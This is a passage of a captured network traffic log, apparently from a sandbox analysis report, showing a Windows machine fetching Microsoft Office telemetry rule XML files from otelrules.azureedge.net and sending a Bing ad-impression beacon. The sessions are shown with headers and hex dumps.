2024-12-08 12:31:50 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:50 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA4037B0D" x-ms-request-id: e8b3d2c0-701e-0050-0b05-486767000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123150Z-r1cf579d7789trgthC1EWRkkfc00000006200000000027yb x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:50 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
103	192.168.2.6	49844	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:50 UTC	192	OUT	GET /rules/rule120676v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:50 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:50 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B984BF177" x-ms-request-id: 1dbd65e4-a01e-0002-7203-485074000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123150Z-r1cf579d778xq4f9hC1EWRx41g0000000570000000002pu9 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:50 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
104	192.168.2.6	49843	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:50 UTC	192	OUT	GET /rules/rule120675v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:50 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:50 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT ETag: "0x8DC582BA6CF78C8" x-ms-request-id: fdf3550d-a01e-0070-7703-48573b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123150Z-r1cf579d778zvkpnhC1EWRv23g00000005r0000000000xnh x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:50 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
105	192.168.2.6	49845	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:50 UTC	192	OUT	GET /rules/rule120677v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:51 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:51 GMT Content-Type: text/xml Content-Length: 405 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT ETag: "0x8DC582B942B6AFF" x-ms-request-id: b8e80a8d-201e-000c-1e03-4879c4000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123151Z-r1cf579d7786c2tshC1EWRr1gc00000004x00000000059m2 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:51 UTC	405	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <

Session ID	Source IP	Source Port	Destination IP	Destination Port
106	192.168.2.6	49846	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:51 UTC	192	OUT	GET /rules/rule120678v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:51 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:51 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA642BF4" x-ms-request-id: 555e9168-001e-0017-4603-480c3c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123151Z-r1cf579d778lntp7hC1EWR9gg400000004vg000000001sag x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:51 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.6	49847	150.171.28.10	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:51 UTC	921	OUT	GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8rIdI2f7TAgV0fWA4xBNeCTVUCUzRihPMdFqQEB6djcaqoOqla3lmkFADcyin24pa38fROLhpUPuImfZ3LxvNDTrA5u_dkqdDxq-2llIR-5YyITPigvfs6NsrCBI4I1hwzyqbJjcAK4devJxwJch0yHfuLUJgFZLrN1skS1oalKbvLbQ4%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZnd3dy5taWNyb3NvZnQuY29tJTJmZWRnZSUyZndpbmRvd3MtZWRnZSUzZmZvY3VzJTNkY29udmVuaW5jZSUyNnNvdXJjZSUzZGlwJTI2ZXMlM2QwJTI2Zm9ybSUzZE01MDBFNyUyNk9DSUQlM2RNNTAwRTc%26rlid%3D4c0619cfda581ab7e0f47e9a4bcc54bd&TIME=20241208T123144Z&CID=531538185&EID=&tids=15000&adUnitId=11730597&localId=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&deviceId=6966555320912735&anid=DA18C8825356BAC4E7B23066FFFFFFFF HTTP/1.1 Accept-Encoding: gzip, deflate User-Agent: WindowsShellClient/9.0.40929.0 (Windows) Host: g.bing.com Connection: Keep-Alive Cookie: MUID=0762B76A2A0E624A0D08A2252B7C63F0; _EDGE_S=SID=13F97BD35778634103906E9C56606285; MR=0
2024-12-08 12:31:52 UTC	763	IN	HTTP/1.1 204 No Content Cache-Control: no-cache, must-revalidate Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Set-Cookie: MSPTC=sm64bIMRVg6mtjXA3k_c4MdwoDgBmNFHUMeD8Cbepfc; domain=.bing.com; expires=Fri, 02-Jan-2026 12:31:51 GMT; path=/; Partitioned; secure; SameSite=None Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * X-Cache: CONFIG_NOCACHE Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: 45AD3A99B884444FA91D903AC1AC848F Ref B: EWR30EDGE0410 Ref C: 2024-12-08T12:31:51Z Date: Sun, 08 Dec 2024 12:31:50 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
108	192.168.2.6	49848	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:51 UTC	192	OUT	GET /rules/rule120679v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:52 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:52 GMT Content-Type: text/xml Content-Length: 174 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT ETag: "0x8DC582B91D80E15" x-ms-request-id: 18148ef3-001e-002b-2504-4899f2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123152Z-r1cf579d778v97q7hC1EWRf95c00000004z0000000004frn x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:52 UTC	174	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>

Session ID	Source IP	Source Port	Destination IP	Destination Port
109	192.168.2.6	49849	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:52 UTC	192	OUT	GET /rules/rule120680v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:52 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:52 GMT Content-Type: text/xml Content-Length: 1952 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT ETag: "0x8DC582B956B0F3D" x-ms-request-id: 42d07f15-f01e-0099-5306-489171000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123152Z-r1cf579d778xr2r4hC1EWRqvfs00000005ag000000004k8z x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:52 UTC	1952	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>

Session ID	Source IP	Source Port	Destination IP	Destination Port
110	192.168.2.6	49850	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:52 UTC	192	OUT	GET /rules/rule120681v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:52 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:52 GMT Content-Type: text/xml Content-Length: 958 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT ETag: "0x8DC582BA0A31B3B" x-ms-request-id: 0b61f7bb-f01e-0052-4103-489224000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123152Z-r1cf579d778zvkpnhC1EWRv23g00000005pg000000002abc x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:52 UTC	958	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>

Session ID	Source IP	Source Port	Destination IP	Destination Port
111	192.168.2.6	49851	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:53 UTC	192	OUT	GET /rules/rule120682v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:53 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:53 GMT Content-Type: text/xml Content-Length: 501 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT ETag: "0x8DC582BACFDAACD" x-ms-request-id: 7e532cc8-301e-000c-2603-48323f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123153Z-r1cf579d778d5zkmhC1EWRk6h800000005x0000000000p7e x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:53 UTC	501	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="

Session ID	Source IP	Source Port	Destination IP	Destination Port
112	192.168.2.6	49852	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:53 UTC	193	OUT	GET /rules/rule120602v10s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:53 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:53 GMT Content-Type: text/xml Content-Length: 2592 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB5B890DB" x-ms-request-id: b9410fe1-901e-0015-5b03-48b284000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123153Z-r1cf579d7789trgthC1EWRkkfc00000005y0000000005bxq x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:53 UTC	2592	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=

Session ID	Source IP	Source Port	Destination IP	Destination Port
113	192.168.2.6	49853	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:54 UTC	192	OUT	GET /rules/rule120601v3s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:54 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:54 GMT Content-Type: text/xml Content-Length: 3342 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT ETag: "0x8DC582B927E47E9" x-ms-request-id: 1dbd6d1b-a01e-0002-3903-485074000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123154Z-r1cf579d778qlpkrhC1EWRpfc80000000620000000002nvg x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:54 UTC	3342	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI

Session ID	Source IP	Source Port	Destination IP	Destination Port
114	192.168.2.6	49854	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:54 UTC	193	OUT	GET /rules/rule224901v11s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
